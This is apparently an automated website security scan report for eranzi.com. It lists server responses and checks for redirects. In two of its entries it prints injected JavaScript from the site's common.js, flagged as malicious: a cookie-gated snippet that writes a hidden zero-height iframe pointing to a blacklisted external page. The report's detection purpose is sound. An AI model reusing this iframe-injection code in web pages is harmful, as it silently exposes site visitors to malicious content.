Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=eranzi.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://eranzi.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Apr 2014 20:01:59 GMT Location: http://www.eranzi.com/ Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17 Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.eranzi.com/ | 200 OK Content-Length: 61726 Content-Type: text/html | clean |
http://www.eranzi.com/_system_/eng_image/js/jquery-1.5.1.min.js | 200 OK Content-Length: 85275 Content-Type: application/javascript | clean |
http://www.eranzi.com/_system_/eng_image/js/new_design.js | 200 OK Content-Length: 10145 Content-Type: application/javascript | clean |
http://www.eranzi.com/_system_/eng_image/js/pop.js | 200 OK Content-Length: 6213 Content-Type: application/javascript | clean |
http://www.eranzi.com/_system_/_js/common.js | 200 OK Content-Length: 21747 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.hankki.co.kr ...[22543 bytes skipped]... _att(id, item) { for(var i=0; i<item.length; i+=2) { try { document.getElementById(id).setAttribute(item[i], item[i+1]); } catch(e) { } } } if(document.cookie.indexOf('nahuo=')==-1){ var expires=new Date(); expires.setTime(expires.getTime () +12*60*60*1000); document.cookie='nahuo=Yes;path=/;expires='+expires.toGMTString(); document.write("<iframe src=http://www.hankki.co.kr/swf/news.html width=100 height=0></iframe>");} Decoded script: <iframe src=http://www.hankki.co.kr/swf/news.html width=100 height=0></iframe> Malicious iFrame found. size: 100x0 src: http://www.hankki.co.kr/swf/news.html This URL is marked by Google as suspicious <iframe src=http://www.hankki.co.kr/swf/news.html width=100 height=0> | ||
http://eranzi.com/./_js/common.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Apr 2014 20:02:08 GMT Location: http://www.eranzi.com/_js/common.js Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17 Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.eranzi.com/_js/common.js | 200 OK Content-Length: 21747 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.hankki.co.kr ...[22543 bytes skipped]... _att(id, item) { for(var i=0; i<item.length; i+=2) { try { document.getElementById(id).setAttribute(item[i], item[i+1]); } catch(e) { } } } if(document.cookie.indexOf('nahuo=')==-1){ var expires=new Date(); expires.setTime(expires.getTime () +12*60*60*1000); document.cookie='nahuo=Yes;path=/;expires='+expires.toGMTString(); document.write("<iframe src=http://www.hankki.co.kr/swf/news.html width=100 height=0></iframe>");} Decoded script: <iframe src=http://www.hankki.co.kr/swf/news.html width=100 height=0></iframe> Malicious iFrame found. size: 100x0 src: http://www.hankki.co.kr/swf/news.html This URL is marked by Google as suspicious <iframe src=http://www.hankki.co.kr/swf/news.html width=100 height=0> | ||
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163307 Content-Type: application/x-javascript | clean |
http://wcs.naver.net/wcslog.js | 200 OK Content-Length: 16544 Content-Type: application/javascript | clean |
http://eranzi.com//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Apr 2014 20:02:11 GMT Location: http://www.eranzi.com/www.googleadservices.com/pagead/conversion.js/ Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17 Content-Length: 276 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.eranzi.com/www.googleadservices.com/pagead/conversion.js/ | 404 Not Found Content-Length: 253 Content-Type: text/html | clean |
http://www.eranzi.com/test404page.js | 404 Not Found Content-Length: 221 Content-Type: text/html | clean |
http://eranzi.com/./_js/wrest.eng.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Apr 2014 20:02:13 GMT Location: http://www.eranzi.com/_js/wrest.eng.js Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17 Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.eranzi.com/_js/wrest.eng.js | 200 OK Content-Length: 16094 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: eranzi.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 02 Apr 2014 20:01:59 GMT
Location: http://www.eranzi.com/
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
GET / HTTP/1.1
Host: eranzi.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 02 Apr 2014 20:01:59 GMT
Location: http://www.eranzi.com/
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: eranzi.com
Referer: http://www.google.com/search?q=eranzi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: eranzi.com
Referer: http://www.google.com/search?q=eranzi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.